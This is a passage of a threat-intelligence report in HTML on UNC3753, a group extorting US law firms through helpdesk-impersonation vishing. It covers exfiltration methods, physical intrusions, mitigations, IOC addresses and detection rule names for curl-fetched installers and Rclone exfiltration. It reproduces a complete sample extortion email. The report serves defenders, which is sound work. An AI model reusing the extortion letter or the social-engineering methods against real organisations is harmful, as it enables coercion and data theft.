&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Threat Actor Extortion Tactics&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Sample Extortion Email&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 99.9641%;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="width: 98.1839%;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Subject: [Victim Name] has lost confidential data of their clients. Very Important!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Hello,&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. &amp;lt;mentions the general nature of the stolen documents&amp;gt;. This is not a joke or a scam.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Reply to Our email and We will show you the complete file tree and actual files.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;All further communication can be done through this email address.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;Figure 2: &lt;span style="vertical-align: baseline;"&gt;UNC3753 e&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;xtortion note example&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Leak Site&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fi3.max-1000x1000.png"
        
          alt="LEAKEDDATA DLS (partially redacted; cropped)"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="20n3k"&gt;Figure 3: LEAKEDDATA DLS (partially redacted; cropped)&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected UNC3753 Activity Involving Physical Access&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent &lt;/span&gt;&lt;a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;FBI Cyber FLASH Alert&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attribution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 (aliases: "Luna Moth," “Chatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and Hardening&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;User Education&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Physical Access and Verification Policies&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Require visitors to display official credentials and photo identification.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Require front-desk staff to copy and log all physical visitor IDs before granting access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Access Conditional Access Controls&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Enforce Strict RMM and Screen-Sharing Software Controls&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Endpoint Removable Media Hardening&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;USB storage device installation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Removable media access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Monitoring and Egress Control&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Block or alert on outbound connections to unauthorized file-sharing APIs and emails.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Ensure full session logging with bytes transferred is enabled within Firewall log configurations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Application Log and Access Auditing&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Outlook and Implications&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Leak Site (DLS)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;hxxps[:]//business-data-leaks[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Phishing Domains&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-itdesk[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-it[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-helpdesk[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs) &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a &lt;a href="https://www.virustotal.com/gui/collection/598281d2c6de83adf1505ee6077608d0c043623d477e2884d36d65e90686d67a/summary" rel="noopener" target="_blank"&gt;GTI Collection&lt;/a&gt; for registered users.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;IOC Type&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.147.131&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.147.138&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;193.141.60.212&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.154.158&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.146.173&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;174.169.162.62&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;64.94.84.97&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Execute MSI Files Downloaded via Curl&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected Rclone Exfiltration&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;MITRE ATT&amp;amp;CK&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Tactic&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique ID&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique Name&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
